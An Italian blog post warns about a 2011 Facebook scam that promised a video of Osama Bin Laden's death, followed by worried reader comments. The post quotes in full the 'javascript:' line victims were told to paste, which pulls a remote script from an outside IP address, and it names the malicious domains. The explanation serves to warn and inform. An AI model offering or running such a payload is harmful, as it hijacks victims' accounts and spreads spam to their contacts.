Osama Bin Laden ora è un virus su Facebook

Da ieri sera la curiosità morbosa e le perplessità diffuse sulla morte di Osama Bin Laden sono diventate un virus, anche se tecnicamente si può definire in molti altri modi, che impazza su Facebook e frega centinaia di migliaia di incauti navigatori.

 

Come funziona? Si riceve sulla bacheca, o via chat o via messaggio privato, la segnalazione da parte di un amico che invita a visitare una pagina Facebook trappola, dove si dovrebbe poter vedere il video segreto della morte del leader di AlQaeda. Il link di solito è accompagnato da un breve messaggio generico come “questo è davvero scioccante..”. Inutile dire che la quasi totalità dei detentori di un profilo non esita un solo secondo e clicca compulsivamente sul link, per atterrare su una pagina pubblica dove si aspetta di trovare il famigerato video: la pagina trappola, per l’appunto.

 

Fin qui tutto bene? Non proprio. Già la semplice pressione del link conduce attraverso una serie interminabile di redirect dietro le quinte, ovvero di rimbalzi tra server e pagine diverse, che ogni volta caricano contenuti e script potenzialmente malevoli nel computer dello sprovveduto curiosone (curiosity killed the cat, ah…se ogni tanto ce lo ricordassimo!). Ecco una stampata ottenuta con uno sniffer http (cliccare sull’immagine per una vederne una versione più nitida).

 

 

 Come si può vedere dalla lista dello scambio http, vengono caricati contenuti remoti non appartenenti al dominio di Facebook. Per esempio la maschera finale presente sulla pagina pubblica di destinazione è residente su http://www.brievela.info/0sama/, e non è escluso che durante questi rimbalzi possano salire a bordo script malevoli. Per esempio, questo che fa di preciso: http://cdn.tynt.com/tc.js (appositamente non cliccabile)? Andrebbe deoffuscato. Solo alla fine di un lungo ping-pong si atterra finalmente sulla pagina pubblica cosiddetta trappola, che ha l’unico scopo di diffondere la procedura a tutta la lista dei propri amici Facebook. La pagina non mostra infatti alcun video, nè una tradizionale bacheca con messaggi, ma un modulo con una serie di istruzioni (quello caricato da www.brievela.info/Osama), criptiche per i più, che una volta eseguite passo passo – si assicura – permetteranno di vedere il video tanto agognato.

 

 

 

L’aspetto della pagina trappola di per se stesso dovrebbe bastare a dissuadere anche gli individui meno sospettosi per natura (ignari che il solo fatto di esservi approdati abbia comportato una navigazione intermedia così tempestosa e foriera di un destino poco fortunato). Invece no: il fascino dell’hacker fai-da-te, destato dall’emozione di immettere codici informatici di cui non si capisce assolutamente nulla, è una tentazione troppo forte. Così l’incauto internauta esegue le istruzioni, ed è lì che i fantasiosi progettisti del software malevolo possono cantare vittoria, perché inizia finalmente la fase finale, quella della riproduzione sessuale del virus sociale.

E’ difficile spiegare a chi non è del mestiere cosa fanno quelle righe di codice che, con un po’ di leggerezza, si eseguono spontaneamente, rapiti dai fumi dell’ossessione morbosa, ma proverò a farlo con parole semplici, perché il meccanismo sia chiaro a chi informatico non è – e del resto, se lo fosse, non ci sarebbe cascato.

Il programma con il quale navigate in internet, detto browser (per esempio Internet Explorer, Firefox, Chrome, Opera, Safari e via dicendo sono tutti browser, cioè “navigatori”), è capace non solo di leggere il contenuto informativo di una pagina, ovvero il layout e il testo, ma anche di eseguire istruzioni scritte in linguaggi di programmazione alquanto limitati ma sufficienti a fare la maggior parte delle cose necessarie per la navigazione online. Questi linguaggi sono i cosiddetti “linguaggi di scripting“, e il codice che eseguono si chiama “script“. Uno dei linguaggi di scripting più usati si chiama “javascript“. Se digitate javascript:alert(‘Bravo: hai vinto un premio!’); nella barra dove inserite gli indirizzi internet, in molti casi potrete rendervi conto da soli di quello che accade.

Cosa vi viene chiesto di inserire nella barra degli indirizzi? Questo:

javascript: (a=(b=document).createElement(‘script’)).src = ‘//109.230.246.175/strummer.php?’ + Math.random(),b.body.appendChild(a);void(0)

Il codice crea banalmente un nuovo script, carica il contenuto (le effettive linee di codice, cioè il programma da eseguire) da un server remoto (//109.230.246.175/strummer.php), si assicura che il browser lo ricarichi ogni volta che si tenta di eseguire nuovamente l’operazione, aggiungendo un codice matematico casuale in coda alla richiesta ( Math.random() genera numeri casuali tra 0 e 1), sostanzialmente al fine di ingannare il meccanismo di caching del browser fingendo che l’indirizzo sia ogni volta diverso, mentre a cambiare è solo un singolo parametro inutilizzato, e infine aggiunge dinamicamente, al volo, lo script così caricato al corpo del documento della pagina internet sulla quale vi trovate. In buona sostanza, è come se lo script facesse parte effettivamente di quelli che, nel caso di specie, la pagina originaria di Facebook mette a disposizione.

A quel punto il codice (lo script) caricato da remoto viene eseguito automaticamente. Per chi ci volesse guardare dentro, lo allego in un file di testo con estensione txt (e quindi innocuo, non eseguibile) e scaricabile da qui.

Cosa fa di preciso? Difficile dirlo con esattezza senza rompersi il capo riga per riga, cercando di riportare ordine nella formattazione caotica dello script, e io non ne ho voglia. Ma ad uno sguardo generico mi pare si possa affermare che non faccia nulla di grave (dove per grave intendo trafficare tra i vostri dati sul computer e trasferire codici di carte di credito, password bancarie, installare malware etc, e del resto per quello il rischio maggiore, se c’è stato, l’abbiamo corso cliccando inizialmente sul primo link), se non iniziare ad interagire con il motore di scripting di Facebook, ovvero quella libreria inclusa nelle pagine del social network proprio al fine di permettere un’interazione programmabile con tutte le complesse funzionalità del sito, e dare inizio ad un trasferimento di massa verso tutti i vostri contatti. Non prima di avere però effettuato una chiamata a una misteriosa pagina, ottenuta attraverso l’uso programmatico dei servizi di “url shortening” (i siti che abbreviano gli indirizzi lunghi e li fanno piccini piccini): http://www.mytimecount.info/red.php, che al momento in cui scrivo risulta indisponibile ma che proprio grazie al meccanismo del redirect offerto dall’url shortener avrà già cambiato dinamicamente il suo indirizzo e si sarà trasferita agilmente altrove. Tale pagina dovrebbe essere sostanzialmente, seppure migrata rispetto alla volta precedente, la prima visitata dal vostro amico del cuore che state per fregare, quella che dopo avere iniettato il browser di codici affatto benevoli redirezionerà l’utente verso l’indirizzo di una pagina trappola nuova, creata ad hoc a mano a mano che quelle vecchie vengono di volta in volta disattivate dal sistema di protezione di Facebook.

Inizialmente, in maniera abbastanza furba, lo script vi invita ad attendere, mostrando il seguente messaggio a schermo: “Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!“. Lo scopo è quello ovvio di permettere allo script di completare i suoi traffici, che in dipendenza dal numero di amici che avete possono richiedere anche diversi minuti, scongiurando il rischio che vi stufiate e abbandoniate la pagina, interrompendo implicitamente ogni attività. Nel frattempo inizia a diffondersi a tutti i vostri contatti sulla chat, con il seguente testo: “Guarda il video dell’esecuzione di osama bin laden :“, seguito da un indirizzo sempre diverso in maniera da inficiare il meccanismo di segnalazione di Facebook. La seconda mossa è quella di postare il link alle pagine facebook trappola sulle bacheche di tutti i vostri amici, attirandoli sostanzialmente con un paio di messaggi di testo: “questo è davvero scioccante..” e “guarda cosa fanno questi soldati ad Osama! ” e con un’immagine di Osama Bin Laden che viene recuperata da qui: http:// i54.tinypic.com / k0r1xh.jpg. Poi, e questo spiega l’alto numero di fan di queste pagine pubbliche, attiva l’evento “MI PIACE” della pagina al posto vostro, iscrivendovi di fatto tra i fan della pagina a vostra insaputa. In questo modo riesce a fare in poche ore decine di migliaia di fan su una singola pagina trappola. Le pagine trappole sembrano essere molte, e probabilmente vengono create di continuo programmaticamente mentre le vecchie vengono disattivate, ma funzionano tutte in modo sostanzialmente simile.

Un giochetto molto pericoloso insomma, la cui parte minacciosa non consiste in quella terminale, come si potrebbe pensare, che serve solo a replicare il modello, ma si compie con il primo click. Oltre a destare seria preoccupazione per il futuro della propria sicurezza digitale, la diffusione del virus sociale costa moltissimo in termini di tempo perso dalla comunità a cancellare dalle bacheche i link che compaiono come i funghi, costa ancor di più in termini di spreco di risorse hardware e software dei server di Facebook, impegnati a soddisfare richieste illegittime che si susseguono a centinaia di migliaia, il che si traduce in probabili rallentamenti del sistema, costa altresì in termini di risorse umane – il personale di Facebook plausibilmente impiegato per arginare il fenomeno – e ovviamente costa all’incauto utente una bella caduta di stile per essersi fatto cogliere in fallo, vittima di una trappola che lo qualifica come un’internauta sprovveduto di fronte a tutti i suoi amici che ricevono i suoi inoltri automatici. Semprechè i suoi amici non siano ancora più ingenui di lui.

Se siete tra coloro che si sono fatti cogliere impreparati, magari perché sovrappensiero, e hanno anche semplicemente cliccato sul primo collegamento che invitava a vedere il video dell’uccisione di Osama, evitate qualsiasi tipo di navigazione che comporti l’invio di dati sensibili e lanciate immediatamente una scansione globale con il vostro antivirus / antimalware / antirootkit e antisfiga di fiducia. Non farlo potrebbe avere effetti imprevisti e possibilmente spiacevoli.

Diffidare, gente, diffidare degli inviti troppo sberluccicanti per essere realistici, e soprattutto dei giochetti inusuali, che dopo un meccanismo di certosino taglia e incolla vi promettono l’accesso a documenti super-segreti. Si tratta sempre al 100% di bufale. E possono costare care.

 

  • Facebook
  • Twitter
  • Digg
  • Delicious
  • Segnalo
  • Diggita
  • Reddit
  • StumbleUpon
  • LinkedIn
  • Upnews
  • FriendFeed
  • Google
  • Tumblr
  • Email
  • OkNotizie
donate

12 risposte a Osama Bin Laden ora è un virus su Facebook

  • 5
    METAL4EVER

    io ho cliccato sul link,ma mi ha reindirizzato alla home di facebook,premetto che stavo con ubuntu.Mi dovrei preoccupare??

    • 5.1

      reindirizza su facebook solo al termine di una serie di invisibili ping pong, come puoi vedere dall’imagine. con Ubuntu stai molto più sicuro.

  • 4
    MaleBolge
  • 3
    kiara

    io sono una delle boccalone che ha a perto il link..mi era parso strano, ma tant’è..cmq cosa devo fare? cosa devo aspettarmi? posso usare il mio pc con tranquillità anche per fare acquisti o controllare conti correnti oppure no? fatemi sapere, in materia sono completamente ignorante!!!

    • 3.1

      Una volta che hai chiuso la pagina trappola di facebook, il codice cessa di esistere, almeno per la lettura che ne ho dato abbastanza sommariamente, ma a naso mi pare abbastanza improbabile che possa fare altro, a meno che quella pagina red,php,chiamata inizialmente, non fosse un veicolo di trojan.

      Una buona scansione con un buon antivirus/antimalware e passa la paura.

  • 2
    iry0013

    Anche io ci sono cascata!!! C’ho cliccatosopra e ho eseguito tutte le istruzioni D:

    E adesso non riesco più a condividere i link su Facebook D:

     

  • 1
    brudicchio

    Io sono stato spinto dalla tentazione a cliccare sul 1° link ora che ho letto questo testo di Byoblu…. comunque ho come antivirus GData IS 2011 in massima protezione su Win7 64bit… non mi ha notificato niente…. anche se dovrei vedere qualche comportamento strano rimetto la copia di sicurezza immagine con Acronis True Image…. GData lo danno per il migliore perchè è l’unico ad avere doppio motore di scansione… ecco la fonte: http://www.av-comparatives.org/images/stories/test/ondret/avc_od_feb2011.pdf

  • 0
    Lagna

    Con Osama non ci sarei cascato…

    Ma quando ho letto “Jessica Alba S€xtape” non ci ho più visto… 

  • -1
    afrodite

    anche io ci sono cascata, ho come antivirus AVG la versione free, pensi che vada bene???? Grazie di tutto ;-)

  • -2
    mattia

    Gentile Byoblu,

    io ci sono finito sulla pagina da un articolo – non ci crederai – su corriere.it, che contiene il link. Poi ho chiuso tutto, mi sono disconnesso e ho fatto una scansione completa e profonda con avast. Non è stato trovato nulla… devo stare tranquillo o sono ancora in pericolo?

    Grazie mille

  • -3
    _Luca_

    Grazie Claudio, per la segnalazione e per la spiegazione a chi se ne intende meno di te…

    Ti vorrei fare una domanda: questo passaggio

    QUOTE

    Inizialmente, in maniera abbastanza furba, lo script vi invita ad attendere, mostrando il seguente messaggio a schermo: “Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!“. Lo scopo è quello ovvio di permettere allo script di completare i suoi traffici…

    UNQUOTE

    si verifica anche sui siti di hosting (tipo Megaupload) fanno aspettare TOT secondi prima di iniziare il download?

     

    Ciao e buona guarigione…

     

    Luca

Avvertenze da leggere prima di intervenire sul blog di ByoBlu.


Non sono consentiti:
* messaggi non inerenti al post
* messaggi privi di indirizzo email
* messaggi anonimi (cioè senza nome e cognome)
* messaggi pubblicitari
* messaggi con linguaggio offensivo
* messaggi che contengono turpiloquio
* messaggi con contenuto razzista o sessista
* messaggi il cui contenuto costituisce una violazione delle leggi italiane
  (istigazione a delinquere o alla violenza, diffamazione, ecc.)
* messaggi il cui contenuto rappresenta un'aggressione alla persona e non alle sue idee
* messaggi eccessivamente lunghi
* messaggi formattati in modo da diminuire la fruibilità delle discussioni

Non è possibile copiare e incollare commenti di altri nel proprio. Comunque il proprietario del blog potrà in qualsiasi momento, a suo insindacabile giudizio, cancellare i messaggi. In ogni caso il proprietario del blog non potrà essere ritenuto responsabile per eventuali messaggi lesivi di diritti di terzi.

I Mini Blu

La violazione della legge sulla propaganda elettorale. Registrate e denunciate.

Registra e denuncia violazione della legge sulla propaganda elettorale Ancora adesso, mentre scrivo, a votazioni in corso, se aprite i social network vi potete imbattere facilmente nella propaganda a favore del Sì al Referendum Costituzionale. La campagna per il Sì in rete è stata invasiva e ai limiti dell'illegalità. Cosa dice la...--> LEGGI TUTTO

Grazie Giorgio Napolitano!? Chapeau!? Si sono bevuti il cervello!?

M5S Grazie Giorgio Stiamo parlando di Giorgio Napolitano? Quello che nel 2011 ha spianato la strada alla troika del governo Monti? Quello che ha firmato qualunque cosa? Quello che nel 2013, quando c'erano le consultazioni per formare un nuovo governo, ha chiamato al Quirinale Pdl e Pd ignorando il...--> LEGGI TUTTO

Ce lo chiede Beppe

Ce lo chiede Beppe Quindi, ricapitolando, il "collegio dei probiviri" di un movimento di democrazia diretta come il M5S è composto da tre nomi fatti per intero dal capo politico, senza che la "rete" possa nominarli non dico tutti, ma almeno un paio o anche uno solo. Peggio del direttorio dove...--> LEGGI TUTTO

Notizie dal web

La lettera di una mamma lavoratrice che fa venire il magone

Mamme lavoratrici: la triste realtà che si cela dietro alla famiglia del Mulino BiancoPubblico questa lettera (inviata a Beppe Severgnini sul Corriere della Sera), che fa venire il magone non solo a chi l'ha scritta ma anche a me che l'ho letta, e nella quale credo si riconoscano tante, troppe mamme lavoratrici, perché sia motivo di riflessione sul modo in cui si è...--> LEGGI TUTTO

La lobby dello zucchero uccide – i nuovi documenti tenuti nascosti

la lobby dello zucchero uccideNEW YORK: Decine di scienziati, negli Anni 60, furono pagati dall'industria americana dello zucchero per sminuire il collegamento tra consumo di zucchero e problemi cardiaci e spostare così l'attenzione sui grassi saturi. A rivelarlo sono una serie di nuovi documenti scoperti recentemente da un ricercatore della University of California di...--> LEGGI TUTTO

Caro M5S, volete allargare il direttorio? Bene, ma dovreste fare così…

votazione online democrazia direttaBarbara Lezzi, senatrice M5S, ha rilasciato un'intervista al Fatto Quotidiano sulle questioni romane. L'ipotesi, che alcuni organi di stampa dicono condivisa anche dalla Casaleggio Associati, è quella di allargare il direttorio a 30/40 persone. Una vera e propria struttura di intermediazione (di quelle che ancora oggi non sono previste dal "Non...--> LEGGI TUTTO

CURIOSITA’

Dai siti web agli oggetti web: la rete delle idee che sta per arrivare.

Libro digitale su una panchina internet delle cose Che lo crediate o no, c'è stato un tempo in cui per costruire un sito web di successo bastava conoscere un po' di html. Era la fine degli anni '90 ed è stato così anche per una buona parte degli anni 2000. Affittavi un po' di spazio...--> LEGGI TUTTO

Come funziona l’Italia: noi siamo quelli con il fiore in mano

Come funziona l'ItaliaCome funziona l'Italia Ecco come funziona la nostra società. Questa è l'Italia. E, ...caso mai cercaste il pallino "voi siete qui", in questo disegno noi siamo quelli con il fiore in mano....--> LEGGI TUTTO

I nanorobot a controllo mentale che vi osserveranno.

I NANOROBOT A CONTROLLO MENTALE CHE VI OSSERVERANNOPer la prima volta, una creatura vivente è stata controllata dall'uomo utilizzando esclusivamente il pensiero, grazie a nanorobot che hanno rilasciato all'interno di alcuni scarafaggi dosi programmate di farmaci, in risposta all'attività cerebrale di chi ha condotto l'esperimento. Una tecnica che - sostengono già alcuni - potrebbe essere molto utile per il trattamento...--> LEGGI TUTTO

Categorie
Le vostre email

Volete sapere perché siamo 73° per libertà di stampa? Eccovi serviti!

Libertà di stampa - in Italia siamo semi-liberi di Godot_74 L'Italia nel 2015 è scesa al 73° posto nella classifica sulla "libertà di stampa". Viene definita anche "semi-libera". Più che parlare di libertà di stampa, però, forse sarebbe il caso di concentrare l'attenzione sulla sua completezza, indipendenza ed obiettività. (altro…)...--> LEGGI TUTTO

tasto_newsletter
Video dal web

Massimo D’Alema: è grazie a noi se M5S non ha vinto da solo!

Massimo D'Alema Massimo D'Alema fa la sua analisi del voto del referendum. Parla sarcasticamente delle rottamazioni di Matteo Renzi e afferma che se non ci fossero stati loro, il M5S avrebbe vinto da solo. ...GUARDA

I Cinque Stelle alla stampa: ora elezioni subito!

m5s-conferenza-stampa-iconaLa conferenza stampa del Movimento 5 Stelle alla Camera dei Deputati dopo la vittoria del No al Referendum Costituzionale. Davanti ai giornalisti, a tarda ora, dopo le dimissioni di Matteo Renzi, si sono presentati Vito Crimi, Danilo Toninelli, Alessandro Di Battista e Giulia Grillo, per dire al Presidente della Repubblica...GUARDA

Brunetta canta vittoria: Renzi ora si dimetta!

Renato Brunetta Brunetta canta vittoria: Renzi ora si dimetta!...GUARDA

Galloni e Rinaldi al Quirinale: ora Mattarella stralci il Pareggio di Bilancio

Galloni Rinaldi Quirinale Nino Galloni e Antonio Rinaldi salgono al Quirinale per chiedere simbolicamente a Mattarella che ora rispetti la volontà del popolo e si adoperi per rispettare la Costituzione italiana, stralciando subito il Pareggio di Bilancio ora Mattarella stralci Pareggio di Bilancio...GUARDA

Salvini – Vittoria del popolo contro i poteri forti di tutto il mondo

Salvini referendum La prima dichiarazione dopo gli Exit Poll che danno la vittoria del No a 55%-59% è di Matteo Salvini, che parla testualmente di "una vittoria del popolo contro i poteri forti di gran parte del mondo"....GUARDA

Renzi vs Gruber: volata finale sul Referendum

Renzi Gruber Referendum Otto e 1/2 Sintesi dell'intervento di Matteo Renzi, questa sera, a Otto e Mezzo, per la volata finale sul Referendum Costituzionale....GUARDA

La Santanché furiosa sui pallisti Pd diventa una bestia

la santanche furiosa sui pallisti pd diventa una bestia Daniela Santanché si infuria a Coffee Break sul voto di Forza Italia alla Camera sulla Riforma Costituzionale, e chiede il fact checking. Guarda anche: ...GUARDA

Referendum: le COJONATE di Franceschini e Poletti sulle ragioni del Sì

Referendum: le COJONATE di Franceschini e Poletti sulle ragioni del Sì Le cojonate di Franceschini e Poletti, ministri della cultura e del lavoro, a Tribuna Politica di Semprini, nel tentativo imbarazzante di difendere le ragioni del sì al Referendum Costituzionale, fanno sembrare le forziste Laura Ravetto e Anna Maria Bernini due emerite costituzionaliste. Tante fesserie tutte insieme...GUARDA

Film, libri e Dvd

Il ritorno alla bellezza passa anche dall’acquisto di un oggetto di design

Design e bellezza Ci sono oggetti che devono semplicemente funzionare, non importa quanto siano brutti. E, soprattutto, devono rompersi in fretta, in maniera da poter essere acquistati nuovamente, e poi ancora, e ancora, infinite volte. Tante quante bastano a soddisfare le esigenze del sistema produttivo. Altri devono semplicemente essere...==> GUARDA TUTTO ==>

Le cuffie migliori per la musica

Cuffie Pryma C'era un tempo in cui il mangiadischi la faceva da padrone. La cosiddetta alta fedeltà era un lusso per pochi, spesso riservata agli studi di registrazione dove le celebrità registravano le loro nuove hits. Poi vennero gli Hi-Fi, prodotti consumer ma con la capacità di riprodurre un'ampia...==> GUARDA TUTTO ==>

Lights Out: Terrore nel Buio – Trailer Hd ITA ufficiale #NonSpegnereLaLuce – film horror

LIGHTS OUT TERRORE NEL BUIO TRAILER ITA HD UFFICIALEIl trailer HD ITA (in italiano) di Lights Out: terrore nel buio. #NonSpegnereLaLuce I migliori film horror a casa tua: Film Horror al Cinema. Dal produttore James Wan (“L’evocazione-The Conjuring”), è in arrivo il racconto di un terrore sconosciuto in...==> GUARDA TUTTO ==>